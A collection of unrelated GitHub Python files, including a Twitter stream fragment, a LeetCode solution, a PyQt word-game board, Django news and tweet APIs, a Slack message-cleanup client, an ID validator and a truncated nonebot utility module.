if enum_of_proc_target_item == EnumOfProcTargetItem.USER_ID:
# 指定したユーザIDのフォロイーのツイートを配信する場合
user_pages = twitter_users_util.get_followee_pages(
use_debug_mode,
api,
user_id=item,
num_of_data=twitter_tweets_util.EnumOfStream.MAX_NUM_OF_FOLLOWING.value,
)
elif enum_of_proc_target_item == EnumOfProcTargetItem.LIST_ID:
# 指定したリストIDのツイートを配信する場合
user_pages = twitter_users_util.get_list_member_pages(use_debug_mode, api, list_id=item)
elif enum_of_proc_target_item == EnumOfProcTargetItem.LIST_NAME:
# 指定したリスト名のツイートを配信する場合
lists: ResultSet = twitter_users_util.get_lists(use_debug_mode, api)
for list_ in lists:
if list_.name == item:
user_pages = twitter_users_util.get_list_member_pages(use_debug_mode, api, list_id=list_.id)
break
elif enum_of_proc_target_item == EnumOfProcTargetItem.FILE_PATH:
# 指定したファイルに記載されているユーザのツイートを配信する場合
list_member_df: pd.DataFrame = pandas_util.read_list_member_file(use_debug_mode, item, header_line_num)
user_ids: list[str] = [
str(list_member[const_util.LIST_MEMBER_HEADER[0]]) for _, list_member in list_member_df.iterrows()
]
user_pages = twitter_users_util.lookup_users(use_debug_mode, api, user_ids)
# フォローユーザIDの生成
following_user_ids: list[str] = [user.id for users_by_page in user_pages for user in users_by_page]
if len(following_user_ids) > 0:
clg.log_inf(f"配信対象:{len(following_user_ids)}人")
else:
raise (pyl.CustomError(f"フォローユーザが存在しません。"))
# キーワードリストの生成
keywords: list[str] = pyl.generate_str_list_from_csv(keyword_of_csv_format)
# ツイートの配信
twitter_tweets_util.stream_tweets(use_debug_mode, api, following_user_ids, keywords)
except Exception as e:
raise (e)
finally:
if clg is not None:
clg.log_inf(f"ロジック実行(Twitterツイート配信)を終了します。")
return None
| silverag-corgi/twitter-app | src/twitter_app/logic/twitter_tweet_stream.py | twitter_tweet_stream.py | py | 3,511 | python | ja | code | 0 | github-code | 13 |
31943752910 | from typing import List
# @lc code=start
class Solution:
def largestTriangleArea(self, points: List[List[int]]) -> float:
def area(p1: List[int], p2: List[int], p3: List[int]) -> float:
x1, y1 = p1
x2, y2 = p2
x3, y3 = p3
return 0.5 * abs(x1 * y2 + x2 * y3 + x3 * y1 - x1 * y3 - x2 * y1 -
x3 * y2)
ans, n = 0, len(points)
for i in range(n):
for j in range(i + 1, n):
for k in range(j + 1, n):
ans = max(ans, area(points[i], points[j], points[k]))
return ans
# @lc code=end
| wylu/leetcodecn | src/python/p800to899/812.最大三角形面积.py | 812.最大三角形面积.py | py | 642 | python | en | code | 3 | github-code | 13 |
5185661086 | import sqlite3
import pymorphy2
import random
from PyQt5.QtGui import QColor, QPainter
def get_x(x, offset, hor):
if hor:
return x + offset
else:
return x
def get_y(y, offset, hor):
if hor:
return y
else:
return y + offset
class Board:
def __init__(self, log):
self.let_con = sqlite3.connect('res/letters.db')
self.morph = pymorphy2.MorphAnalyzer()
self.words = []
self.log = log
self.boosters = {}
with open('res/boosters.txt') as f:
for i, line in enumerate(f.readlines()):
for j, boost in enumerate(line.split()):
if boost != 0:
self.boosters[j, i] = int(boost)
def generate(self):
self.grid = [[''] * 16 for _ in range(16)]
self.chips = []
cur = self.let_con.cursor()
for i in cur.execute('''SELECT * FROM letters''').fetchall():
for j in range(i[2]):
self.chips.append(i[1])
self.chips = random.sample(self.chips, len(self.chips))
def take_chip(self):
return self.chips.pop(-1)
def next_chips(self):
if len(self.chips) < 7:
self.curr_chips = [''] * 7
else:
self.curr_chips = [self.take_chip() for _ in range(7)]
def update_chips(self, btns):
for i, btn in zip(self.curr_chips, btns):
btn.setText(i)
if i != '':
btn.setToolTip(f'Очков за букву: {self.get_letter_value(i)}')
else:
btn.setToolTip('')
def get_letter_value(self, let):
cur = self.let_con.cursor()
point = cur.execute(f'''SELECT value FROM letters WHERE char='{let}' ''')
for j in point:
return j[0]
def update_grid(self, btns):
for i, j in zip(self.grid, btns):
for let, btn in zip(i, j):
if let != '':
btn.stat = True
btn.setEnabled(False)
btn.setText(let)
def update_boosters(self, btns):
for i, line in enumerate(btns):
for j, btn in enumerate(line):
btn.setProperty('boost', self.boosters.get((i, j), 0))
def commit_grid(self, btns, chips):
for i, line in enumerate(btns):
for j, btn in enumerate(line):
self.grid[i][j] = btn.text()
for i, chip in enumerate(chips):
self.curr_chips[i] = chip.text()
def raise_chips(self, btns, cursor):
for i in btns:
if i.text() != '':
self.chips.append(i.text())
print(i.text())
if cursor != '':
self.chips.append(cursor)
print(cursor)
self.chips = random.sample(self.chips, len(self.chips))
def input_word(self, btns, info, fist_word):
res = ''
intersect = False
for i in range(info[2]):
b = btns[get_x(info[0], i, info[3])][get_y(info[1], i, info[3])]
if not fist_word and b.stat:
intersect = True
if fist_word and self.boosters.get((get_x(info[0], i, info[3]), get_y(info[1], i, info[3])), 0) == 5:
intersect = True
let = b.text()
if let == '':
self.log('Empty Space')
return False
res += let
if res in self.words:
self.log('Word already been!!!')
return False
self.words.append(res)
if not intersect:
self.log('Слово не пересекается с предыдущими.')
return False
return self.check_word(res)
def word_points(self, info):
res = 0
cur = self.let_con.cursor()
post_boost = []
for i in range(info[2]):
if info[3]:
res += self.point_boost(info[0] + i, info[1], cur, post_boost)
else:
res += self.point_boost(info[0], info[1] + i, cur, post_boost)
bonus = 0
for i in post_boost:
if i == 3:
bonus += res
if i == 4:
bonus += res * 2
print(f'Bonus: {bonus}')
return res + bonus
# 1 - x2 for letter
# 2 - x3 for letter
# 3 - x2 for word
# 4 - x3 for word
# 5 - Cell for first word
def point_boost(self, x, y, cur, post_boost):
boost = self.boosters.get((x, y), 0)
request = cur.execute(f'''SELECT value FROM letters WHERE char='{self.grid[x][y]}' ''')
for j in request:
res = j[0]
print(f'Before boost: {res}')
if boost == 0:
print('x1')
return res
if boost == 1:
print('x2')
return res * 2
if boost == 2:
print('x3')
return res * 3
if boost == 3 or boost == 4:
post_boost.append(boost)
return res
def close(self):
self.let_con.close()
def check_word(self, word):
res = self.morph.parse(word)
for i in res:
# print(i)
if {'NOUN'} in i.tag and i.normal_form.lower().replace('ё', 'е') == word:
return True
else:
print(f'Incorrect tags: {i}')
print('--------------')
return False
| RustyGuard/PyQTProject | Board.py | Board.py | py | 5,386 | python | en | code | 0 | github-code | 13 |
27547071653 | from django.shortcuts import render
from django.http import JsonResponse
import pandas as pd
from django.views.decorators.csrf import csrf_exempt
# Notice: using different gensim version will cause errors
from gensim.models.doc2vec import Doc2Vec
# (1) Load news data--approach 1
# df = pd.read_csv('dataset/cnn_news_newest_10_regional_category_processed.csv',sep='|')
# (2) Load news data--approach 2
def load_df_data_v1():
global df # global variable
df = pd.read_csv('dataset/ptt_dataset_preprocessed.csv',sep='|')
print(df)
# (3) Load news data--approach 3
# We can use df from the app_user_keyword
# from app_user_keyword.views import df
# (4) Load news data--approach 4
# import from app_user_keyword.views and use df later
import app_user_keyword.views as userkeyword_views
def load_df_data_v2():
# import and use df from app_user_keyword
global df # global variable
df = userkeyword_views.df
# call load data function when starting server
load_df_data_v2()
# Load doc2vec model
def load_doc2vec_model():
global model # global variable
model = Doc2Vec.load("dataset/cna_news_doc2vec.model")
# call load model function when starting server
load_doc2vec_model()
# -- home page
def home(request):
return render(request, "app_news_rcmd/home.html")
# -- API (three APIs)
# -- API: input category
@csrf_exempt
def api_cate_news(request):
cate = request.POST['category']
response = get_cate_latest_news(cate)
return JsonResponse({"latest_news": response})
# -- API: input keywords, get top 5 similar news
# @csrf_exempt # it is OK, because frontend pass the csrf information
def api_keywords_similar_news(request):
keywords = request.POST['tokens']
keywords = [t for t in keywords.split()]
response = get_keywords_most_similar(keywords)
return JsonResponse({"data": response})
# -- API: input news_id, and then get news information
@csrf_exempt
def api_news_content(request):
item_id = request.POST['news_id']
print(item_id)
content = get_news_content(item_id)
related = get_itemid_most_similar(item_id)
# print(related)
return JsonResponse({"news_content": content, "related_news": related})
# -- Given a item_id, get document information
def get_news_content(item_id):
df_item = df[df.category == item_id]
title = df_item.iloc[0].title
content = df_item.iloc[0].content
category = df_item.iloc[0].category
link = df_item.iloc[0].link
date = df_item.iloc[0].date
#photo_link = df_item.iloc[0].photo_link
# if photo_link value is NaN, replace it with empty string
'''if pd.isna(photo_link):
photo_link='''''
news_info = {
"id": item_id,
"category": category,
"title": title,
"content": content,
"link": link,
"date": date,
#"photo_link": photo_link
}
return news_info
#-- Given a category, get the latest news
def get_cate_latest_news(cate):
items = []
df_cate = df[df.category == cate]
# get the last news (the latest news)
df_cate = df_cate.tail(5) # Only 5 pieces
# only return 10 news
for i in range( len(df_cate)):
item_id = df_cate.iloc[i].category
print(item_id)
title = df_cate.iloc[i].title
content = df_cate.iloc[i].content
category = df_cate.iloc[i].category
link = df_cate.iloc[i].link
#photo_link = df_cate.iloc[i].photo_link
# if photo_link value is NaN, replace it with empty string
'''if pd.isna(photo_link):
photo_link='''''
item = {
"id": item_id,
"category": category,
"title": title,
"link": link,
#"photo_link": photo_link
}
items.append(item)
return items
#--Given news keywords, find similar documents
def get_keywords_most_similar(keywords):
new_vector = model.infer_vector(keywords)
similar_items = model.docvecs.most_similar(positive=[new_vector], topn=5)
items = []
for item_id, score in similar_items:
df_item = df[df.category == item_id]
title = df_item.iloc[0].title
content = df_item.iloc[0].content
category = df_item.iloc[0].category
link = df_item.iloc[0].link
#photo_link = df_item.iloc[0].photo_link
# if photo_link value is NaN, replace it with empty string
'''if pd.isna(photo_link):
photo_link='''''
score = round(score, 2)
item = {
"id": item_id,
"category": category,
"title": title,
"link": link,
'score': score,
#"photo_link": photo_link
}
items.append(item)
return items
#-- Given item_id, get three similar news based on the doc2vec model
def get_itemid_most_similar(item_id):
similar_items = model.docvecs.most_similar(positive=[item_id], topn=3)
items = []
for item_id, score in similar_items:
df_item = df[df.category == item_id]
title = df_item.iloc[0].title
content = df_item.iloc[0].content
category = df_item.iloc[0].category
link = df_item.iloc[0].link
#photo_link = df_item.iloc[0].photo_link
# if photo_link value is NaN, replace it with empty string
'''if pd.isna(photo_link):
photo_link='''''
score = round(score, 2)
item = {
"category": category,
"title": title,
"link": link,
"id": item_id,
'score': score,
#"photo_link": photo_link
}
items.append(item)
return items
print("app_doc2vec was loaded!") | guan-jie-chen/Term_Project-Django | app_news_rcmd/views.py | views.py | py | 5,726 | python | en | code | 1 | github-code | 13 |
31006642800 | from django.contrib.auth.models import User, Group
from rest_framework import serializers
from api.models import *
from . import customer_serializer
class ProductTypeSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = producttype_model.ProductType
fields = ('id', 'title',)
class ProductSerializer(serializers.HyperlinkedModelSerializer):
customer = customer_serializer.RestrictedCustomerSerializer(read_only=True)
class Meta:
model = product_model.Product
fields = ('id', 'url', 'customer', 'title', 'description', 'price', 'quantity')
depth = 1
| samphillips1879/bangazon-python-api | api/serializers/product_serializer.py | product_serializer.py | py | 624 | python | en | code | 0 | github-code | 13 |
42757552721 |
import re
print("Bienvenido a la cedulacion! Porfavor introduzca su cedula.")
cedula = input("Coloca su cedula: ")
patron1 = '[1-13]{1}\-[0-9]{0,3}\-[0-9]{0,4}'
patron2 = '([PE]|[N]|[E]){1}\-[0-9]{0,3}\-[0-9]{0,4}'
if re.search(patron1, cedula):
print("La cedula " + cedula + " es valida y ha sido guardada en el registro.")
ruta2 = '.vscode\\Cedula.txt'
archivo_Cedula = open(ruta2, 'a')
archivo_Cedula.write("Una Cedula ha sido guardada \n" )
archivo_Cedula.close()
else:
if re.search(patron2, cedula):
print("La cedula " + cedula + " es valida y ha sido guardada en el registro.")
ruta2 = '.vscode\\Cedula.txt'
archivo_Cedula = open(ruta2, 'a')
archivo_Cedula.write("Una Cedula ha sido guardada \n" )
archivo_Cedula.close()
else:
print("la cedula " + cedula + " es invalid, por favor intente denuevo")
print("Ingrese su nombre.")
ruta = '.vscode\\nombres.txt'
nombres = open(ruta, 'r')
nombre =(input("Introduzca el nombre: "))
if nombre in nombres:
print (" El nombre esta dentro de la lista prohibida de nombres, por favor intentelo denuevo")
else:
print("el nombre: " + nombre + " es valido")
ruta2 = '.vscode\\Cedula.txt'
archivo_Cedula = open(ruta2, 'a')
archivo_Cedula.write("Un nombre ha sido guardada \n" )
archivo_Cedula.close() | MCAlmond/uip-iig-pc3 | practica de expresiones reales y archivos.py | practica de expresiones reales y archivos.py | py | 1,421 | python | es | code | 0 | github-code | 13 |
24346426262 | # # This Program takes Training images from the directory and encode them using face_encoding function from face_recognition and save the encoded images as "train.pkl"
import face_recognition
import cv2
import os
import pickle # Create portable serialized representations of Python objects
print(cv2.__version__)
Encodings=[]
Names=[]
image_dir='/home/rajavel/Desktop/PyProg/FaceRecognizer/demoImages/known' # Training image folder
for root, dirs, files in os.walk(image_dir): # os.walk - Directory tree generator. For each directory in the directory tree rooted at top, yields a 3-tuple - dirpath, dirnames, filenames
print(files)
for file in files:
path=os.path.join(root,file) #Join two or more pathname with file, inserting '/' as needed.
print(path)
name=os.path.splitext(file)[0] # os.path.splitext() method in Python, used to split the path name into a pair root and ext. ext stands for extension of the specified path while root is everything except ext part
print(name)
person=face_recognition.load_image_file(path) # Load the Training images from the specified path
encoding=face_recognition.face_encodings(person)[0] # Encode the person using face_encoding function in face_recognition module
Encodings.append(encoding) # Append the encodings of all the person with Name
Names.append(name)
print(Names)
# Open a file named "train.pkl" with handle "f" for writing bytes (wb) and dump the Encodings and Names
with open('train.pkl','wb') as f:
pickle.dump(Names,f)
pickle.dump(Encodings,f)
| Vishvambar-Panth/Jetson-Nano-Exercise | FaceRecognizer/trainSave.py | trainSave.py | py | 1,582 | python | en | code | 0 | github-code | 13 |
43690461056 | ##Given three integers x,y and z you need to find the
##sum of all the numbers formed by having 4 atmost x
##times , having 5 atmost y times and having 6 atmost
##z times as a digit.
def sumcalc(x,y,z):
if x < 0 or y < 0 or z < 0: return -1
import itertools
sum = 0
for i, j, k in itertools.product(range(x + 1), range(y + 1), range(z + 1)):
e = (('4' * i) + ('5' * j) + ('6' * k))
if e:
perms = [''.join(p) for p in itertools.permutations(e)]
for i in set(perms): sum += int(i)
return sum
| Mythili895/python-coding | leetcode/given_permutation sum.py | given_permutation sum.py | py | 523 | python | en | code | 0 | github-code | 13 |
73720230096 | import numpy as np
import matplotlib.pyplot as plt
from plot_stencil import plot_stencil
plt.figure()
data = np.zeros((30, 30))
data[0, :] = 1
data[:, 0] = 1
data[29, :] = -1
data[:, 29] = -1
data[0,29] = 0
data[29,0] = 0
data2 = data.copy()
for i in range(1,29):
for j in range(1, 29):
data2[i,j] = (i+j) / 60 * (-2) + 1
iter_per_frame = 10
# plt.pause(5)
fig, ((ax1, ax2)) = plt.subplots(nrows=1, ncols=2)
plot_stencil(data, ax1, "Boundary Condition")
plot_stencil(data, ax2, "Boundary Condition")
plt.pause(4)
plot_stencil(data, ax1, "Trivial Initial Value")
plot_stencil(data2, ax2, "Guessed Initial Value")
plt.pause(2)
for frame in range(50):
data_old = data.copy()
data2_old = data2.copy()
for _ in range(iter_per_frame):
for i in range(1, 29):
for j in range(1, 29):
data[i,j] = 0.125*(data[i-1,j] + data[i+1,j] + data[i,j-1] + data[i,j+1]) + 0.5 * data[i,j]
data2[i,j] = 0.125*(data2[i-1,j] + data2[i+1,j] + data2[i,j-1] + data2[i,j+1]) + 0.5 * data2[i,j]
residual = np.abs(np.subtract(data_old, data)).max().max()
residual2 = np.abs(np.subtract(data2_old, data2)).max().max()
title1 = "#Iteration : %d \n residual %f" %(frame * iter_per_frame, residual)
title2 = "#Iteration : %d \n residual %f" %(frame * iter_per_frame, residual2)
plot_stencil(data, ax1, title1)
plot_stencil(data2, ax2, title2)
plt.pause(0.1)
plt.pause(5) | bjmiao/HPC-animation | simulate_stencil.py | simulate_stencil.py | py | 1,446 | python | en | code | 0 | github-code | 13 |
30140632270 | import sys
import requests
from web_wrapper.web import Web
import logging
logger = logging.getLogger(__name__)
class DriverRequests(Web):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.driver_type = 'requests'
self._create_session()
# Headers Set/Get
def get_headers(self):
return self.driver.headers
def set_headers(self, headers):
self.driver.headers = headers
def update_headers(self, headers):
self.driver.headers.update(headers)
# Cookies Set/Get
def get_cookies(self):
return self.driver.cookies.get_dict()
def _clean_cookies(self, cookies):
clean_cookies = []
if isinstance(cookies, dict) is True:
cookies = [cookies]
for cookie in cookies:
if 'name' in cookie and 'value' in cookie:
clean_cookies.append({cookie['name']: cookie['value']})
else:
name = list(cookie.keys())[0]
clean_cookies.append({name: cookie[name]})
return clean_cookies
def set_cookies(self, cookies):
self.driver.cookies = self._clean_cookies(cookies)
def update_cookies(self, cookies):
for cookie in self._clean_cookies(cookies):
self.driver.cookies.update(cookie)
# Proxy Set/Get
def set_proxy(self, proxy):
"""
Set proxy for requests session
"""
# TODO: Validate proxy url format
if proxy is None:
self.driver.proxies = {'http': None,
'https': None
}
else:
self.driver.proxies = {'http': proxy,
'https': proxy
}
self.current_proxy = proxy
def get_proxy(self):
return self.current_proxy
# Session
def _create_session(self):
"""
Creates a fresh session with the default header (random UA)
"""
self.driver = requests.Session(**self.driver_args)
# Set default headers
self.update_headers(self.current_headers)
self.update_cookies(self.current_cookies)
self.set_proxy(self.current_proxy)
def reset(self):
"""
Kills old session and creates a new one with the default headers
"""
self.driver = None
self._create_session()
def quit(self):
"""
Generic function to close distroy and session data
"""
self.driver = None
# Actions
def _get_site(self, url, headers, cookies, timeout, driver_args, driver_kwargs):
"""
Try and return page content in the requested format using requests
"""
try:
# Headers and cookies are combined to the ones stored in the requests session
# Ones passed in here will override the ones in the session if they are the same key
response = self.driver.get(url,
*driver_args,
headers=headers,
cookies=cookies,
timeout=timeout,
**driver_kwargs)
# Set data to access from script
self.status_code = response.status_code
self.url = response.url
self.response = response
response.raise_for_status()
return response.text
except Exception as e:
raise e.with_traceback(sys.exc_info()[2])
| xtream1101/web-wrapper | web_wrapper/driver_requests.py | driver_requests.py | py | 3,626 | python | en | code | 0 | github-code | 13 |
34768874302 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 12 15:35:11 2023
This is a program to calculate earning compound interest
P = Principal amount(initial investment)
r = annual nominal interst rate (as a decimal)
n = number of times the interest is compounded per year
t = number of years
A = final mount
@author: ruyonga
"""
from sys import exit
p = input("How much do you want to invest?\n")
if p.isdigit():
p = float(p)
print("principal is: ", p)
else:
print("Invalid principal amount entered, restart the program")
exit()
r = input("At what annual rate? ex. 10 NOT 10% \n")
if r.isdigit():
r = float(r)/100
print("Interest is: ", r)
else:
print("Invalid entry entered, please enter number")
t = input("For how many years would you like to invest? \n")
if t.isdigit():
t = int(t)
print("investing period: ", t)
else:
print("Invalid value entered, please enter number")
n = input("Enter the number of compounding per year? \n")
if n.isdigit():
n = int(n)
print("Compounding period: ", n)
else:
print("Invalid value entered, please enter number")
print("principal", p, "interest", r, "period", t, "number of times", n)
#BODMAS
compounding = n * t
print("compounding nt:", compounding)
rate = r / n
print("calculated rate r/n:", rate)
step_1 = (1 + rate)
print("step (1 + rate)", step_1)
step_2 = pow(step_1, compounding)
print("step 2 step_2 ^ nt", step_2)
final_amount = p * step_2
print("You will have", str(round(final_amount, 2)), "after", n, "years")
| ruyonga/py101 | homework.py | homework.py | py | 1,554 | python | en | code | 0 | github-code | 13 |
26818987991 | from typing import List
import ebooklib
from bs4 import BeautifulSoup
from ebooklib import epub
def __epub_to_html(epub_path: str) -> list:
"""
Reads and output contents of a specified EPUB file in HTML form
:param epub_path: The full path to the input file
:return: a new list
"""
book = epub.read_epub(epub_path)
htmls = []
for item in book.get_items():
if item.get_type() == ebooklib.ITEM_DOCUMENT:
htmls.append(item.get_content())
return htmls
def __html_to_txt(htmls) -> list:
"""
Given a list of HTML elements encoding a EPUB file text content, extract those text contents and return them in a
list
:param htmls: The provided HTML elements
:return: a new list
"""
txt = []
for html in htmls:
txt.append(BeautifulSoup(html, 'html.parser').get_text().replace('\n', ' '))
return txt
def epub_to_txt(epub_path: str) -> List[str]:
"""
Reads and output contents of a specified EPUB file in a list.
:param epub_path: The full path to the input file
:return: a new list
"""
return __html_to_txt(__epub_to_html(epub_path))
if __name__ == "__main__":
pass
| QubitPi/peitho-data | peitho_data/datafication/epub.py | epub.py | py | 1,195 | python | en | code | 0 | github-code | 13 |
21586228021 | """
Valid Palindrome
----------------
Given a string, determine if it is a palindrome, considering only alphanumeric
characters and ignoring cases.
Note:
For the purpose of this problem, we define empty string as
valid palindrome.
Example 1:
- Input: "A man, a plan, a canal: Panama"
- Output: true
Example 2:
- Input: "race a car"
- Output: false
Reference:
- https://algorithm.yuanbin.me/zh-hans/string/valid_palindrome.html
- https://leetcode.com/problems/valid-palindrome/
- https://www.lintcode.com/problem/valid-palindrome/
"""
import unittest
def is_palindrome(s):
"""
Determine whether or not given string is valid palindrome
:param s: given string
:type s: str
:return: whether or not given string is valid palindrome
:rtype: bool
"""
# basic case
if s == '':
return True
# two pointers
# one from left, one from right
i = 0
j = len(s) - 1
while i < j:
# find left alphanumeric character
if not s[i].isalnum():
i += 1
continue
# find right alphanumeric character
elif not s[j].isalnum():
j -= 1
continue
# case insensitive compare
if s[i].lower() != s[j].lower():
return False
i += 1
j -= 1
return True
class TestValidPalindrome(unittest.TestCase):
def test_valid_palindrome(self):
self.assertTrue(is_palindrome(''))
self.assertFalse(is_palindrome('0P'))
self.assertTrue(is_palindrome('a'))
self.assertTrue(is_palindrome('A man, a plan, a canal: Panama'))
self.assertFalse(is_palindrome('race a car'))
if __name__ == '__main__':
unittest.main()
| corenel/lintcode | algorithms/415_valid_palindrome.py | 415_valid_palindrome.py | py | 1,745 | python | en | code | 1 | github-code | 13 |
3745351590 | from django.conf import settings
from django.http import JsonResponse
from django.shortcuts import render, redirect
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from rest_framework.pagination import PageNumberPagination
from .forms import TweetForm
from .models import Tweet
from .serializers import TweetSerializer, TweetActionSerializer, TweetCreateSerializer
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def tweet_create_view(request, *args, **kwargs):
serializer = TweetCreateSerializer(data=request.data)
if serializer.is_valid(raise_exception=True):
serializer.save(user=request.user)
return Response(serializer.data, status=201)
def get_paginator_response(qs, request):
paginator = PageNumberPagination()
paginator.page_size = 20
paginator_qs = paginator.paginate_queryset(qs, request)
serializer = TweetSerializer(paginator_qs, many=True)
return paginator.get_paginated_response(serializer.data)
@api_view(["GET"])
@permission_classes([IsAuthenticated])
def tweet_feed_view(request, *args, **kwargs):
user = request.user
qs = Tweet.objects.feed(user)
return get_paginator_response(qs, request)
@api_view(['GET'])
def tweet_list_view(request, *args, **kwargs):
qs = Tweet.objects.all()
username = request.GET.get('username')
if username is not None:
qs = qs.filter(user__username__iexact=username)
return get_paginator_response(qs, request)
@api_view(['GET'])
def tweet_detail_view(request, id, *args, **kwargs):
qs = Tweet.objects.filter(id=id)
if not qs.exists():
return Response({}, status=404)
obj = qs.first()
serializer = TweetSerializer(obj)
return Response(serializer.data, status=200)
@api_view(['DELETE', 'POST'])
def tweet_delete_view(request, id, *args, **kwargs):
qs = Tweet.objects.filter(id=id)
if not qs.exists():
return Response({}, status=404)
qs = qs.filter(user=request.user)
if not qs.exists():
return Response({"message": "you cannot delete this tweet."}, status=404)
obj = qs.first()
obj.delete()
return Response({"message": "Tweet successfully removed"}, status=200)
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def tweet_action_view(request, *args, **kwargs):
"""
id is required.
Action option are like, unlike and re-tweet
"""
serializer = TweetActionSerializer(data=request.data)
if serializer.is_valid(raise_exception=True):
data = serializer.validated_data
id = data.get("id")
action = data.get("action")
content = data.get("content")
qs = Tweet.objects.filter(id=id)
if not qs.exists():
return Response({}, status=404)
obj = qs.first()
if action == "like":
obj.likes.add(request.user)
serializer = TweetSerializer(obj)
return Response(serializer.data, status=200)
elif action == "unlike":
obj.likes.remove(request.user)
serializer = TweetSerializer(obj)
return Response(serializer.data, status=200)
elif action == "retweet":
new_tweet = Tweet.objects.create(user=request.user, parent=obj, content=content)
serializer = TweetSerializer(new_tweet)
return Response(serializer.data, status=201)
return Response({}, status=200)
def tweet_create_view_pure_django(request, *args, **kwargs):
# if user is not authenticated
if not request.user.is_authenticated:
if request.is_ajax():
return JsonResponse({}, status=401)
return redirect(settings.LOGIN_URL)
# if user is authenticated
form = TweetForm(request.POST or None)
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user.is_authenticated or None
obj.save()
if request.is_ajax():
return JsonResponse(obj.serialize(), status=201);
return redirect("/")
if form.errors:
if request.is_ajax():
return JsonResponse(form.errors, status=400)
return render(request, "common/form.html", context={"form": form})
def home_view(request, *args, **kwargs):
return render(request, 'pages/home.html')
def tweet_list_view_pure_django(request, *args, **kwargs):
qs = Tweet.objects.all()
tweet_list = [x.serialize() for x in qs]
data = {
"response": tweet_list
}
return JsonResponse(data)
def tweet_detail_view_pure_django(request, id):
data = {
"id": id
}
try:
qs = Tweet.objects.get(pk=id)
data["content"] = qs.content
except:
data["message"] = "no tweet found"
return JsonResponse(data)
| umairkhan987/Django-React-Twitter-App | backend-django/twitterApi/tweets/views.py | views.py | py | 4,842 | python | en | code | 0 | github-code | 13 |
73828120656 | #!/usr/bin/python
import sys, time
from slackclient import SlackClient
class MySlackClient:
token = None
sc = None
default_ch = None
def __init__(self, token, default_ch):
self.token = token
self.sc = SlackClient(token)
self.default_ch = default_ch
def send_message_log(self, msg):
self.sc.api_call(
"chat.postMessage",
channel=self.default_ch,
text=msg
)
def del_parties_msgs(self, user_id, parties_except=None):
parties = self.get_parties_list()
for party in parties:
if party['id'] not in parties_except:
messages = self.retrieve_channel_messages(party['id'])
for m in messages:
if m['user'] == user_id:
self.remove_chat_message(user_id=user_id, chat_id=party['id'], ts=m['ts'])
def get_parties_list(self):
formatted_channels = []
parties = self.sc.api_call('mpim.list', exclude_archived=1)
print(parties)
for party in parties['groups']:
new_channel = {
'name': party['name'],
'id': party['id'],
'creator': party['creator']
}
formatted_channels.append(new_channel)
return formatted_channels
def retrieve_channel_messages(self, chat_id=None):
if not chat_id: chat_id=self.default_ch
messages = self.sc.api_call(
'mpim.history',
channel=chat_id,
count=1000
)
return messages['messages']
def del_private_chats_msgs(self, user_id, chats_except=None):
chats = self.get_private_chats_list()
for chat in chats:
print(chat)
if chat['id'] not in chats_except:
messages = self.retrieve_chat_messages(chat['id'])
for m in messages:
if m['user'] == user_id:
print("Removing: " + m['text'])
self.remove_chat_message(user_id=user_id, chat_id=chat['id'], ts=m['ts'])
time.sleep(1)
def retrieve_chat_messages(self, chat_id):
messages = self.sc.api_call(
'im.history',
channel=chat_id,
count=1000
)
return messages['messages']
def get_private_chats_list(self):
chats = self.sc.api_call(
"im.list"
)
formatted_chats = []
for chat in chats['ims']:
if chat['user'] not in ['U0UFSEW80', 'U0UFNRLUQ']:
formatted_chats.append({
'id': chat['id'],
'user': chat['user']
})
return formatted_chats
def get_channels_list(self):
formatted_channels = []
channels = self.sc.api_call('channels.list', exclude_archived=1)
for channel in channels['channels']:
new_channel = {
'name': channel['name'],
'id': channel['id'],
'creator': channel['creator']
}
formatted_channels.append(new_channel)
print(formatted_channels)
return formatted_channels
def remove_chat_message(self, chat_id, user_id, ts):
self.sc.api_call(
'chat.delete',
channel=chat_id,
ts=ts
)
def get_channel_info(self, channel_name):
channels_list = self.get_channels_list()
for channel in channels_list:
if channel['name'] == channel_name: return channel
| danypr92/PySlackBot | my_slack/my_slack_client.py | my_slack_client.py | py | 3,590 | python | en | code | 0 | github-code | 13 |
10326522677 | def isPalindrome(self, head):
if not head or not head.next:
return True
# 1. Get the midpoint (slow)
slow = fast = cur = head
while fast and fast.next:
fast, slow = fast.next.next, slow.next
# 2. Push the second half into the stack
stack = [slow.val]
while slow.next:
slow = slow.next
stack.append(slow.val)
# 3. Comparison
while stack:
if stack.pop() != cur.val:
return False
cur = cur.next
return True
| NikhilNarvekar123/Competitive-Programming | temp/palindromelinkedlist.py | palindromelinkedlist.py | py | 517 | python | en | code | 0 | github-code | 13 |
41506081333 | # -*- coding: UTF-8 -*-
from sqlitedict import SqliteDict
from nonebot import *
import math
import yaml
import json
import os
import re
bot = get_bot()
class Dict(dict):
__setattr__ = dict.__setitem__
__getattr__ = dict.__getitem__
def dict_to_object(dict_obj):
if not isinstance(dict_obj, dict):
return dict_obj
inst = Dict()
for k, v in dict_obj.items():
inst[k] = dict_to_object(v)
return inst
# 获取配置
def get_config():
file = open(os.path.join(os.path.dirname(__file__), "config.yaml"), 'r', encoding="utf-8")
return dict_to_object(yaml.load(file.read(), Loader=yaml.FullLoader))
# 获取字符串中的关键字
def get_msg_keyword(keyword, msg, is_first=False):
msg = msg[0] if isinstance(msg, tuple) else msg
res = re.split(format_reg(keyword, is_first), msg, 1)
res = tuple(res[::-1]) if len(res) == 2 else False
return ''.join(res) if is_first and res else res
# 格式化配置中的正则表达式
def format_reg(keyword, is_first=False):
keyword = keyword if isinstance(keyword, list) else [keyword]
return f"{'|'.join([f'^{i}' for i in keyword] if is_first else keyword)}"
def get_path(*paths):
return os.path.join(os.path.dirname(__file__), *paths)
db = {}
# 初始化数据库
def init_db(db_dir, db_name='db.sqlite') -> SqliteDict:
if db.get(db_name):
return db[db_name]
db[db_name] = SqliteDict(get_path(db_dir, db_name),
encode=json.dumps,
decode=json.loads,
autocommit=True)
return db[db_name]
# 寻找MessageSegment里的某个关键字的位置
def find_ms_str_index(ms, keyword, is_first=False):
for index, item in enumerate(ms):
if item['type'] == 'text' and re.search(format_reg(keyword, is_first), item['data']['text']):
return index
return -1
# 是否是群管理员
def is_group_admin(ctx):
return ctx['sender']['role'] in ['owner', 'admin', 'administrator']
def filter_list(plist, func):
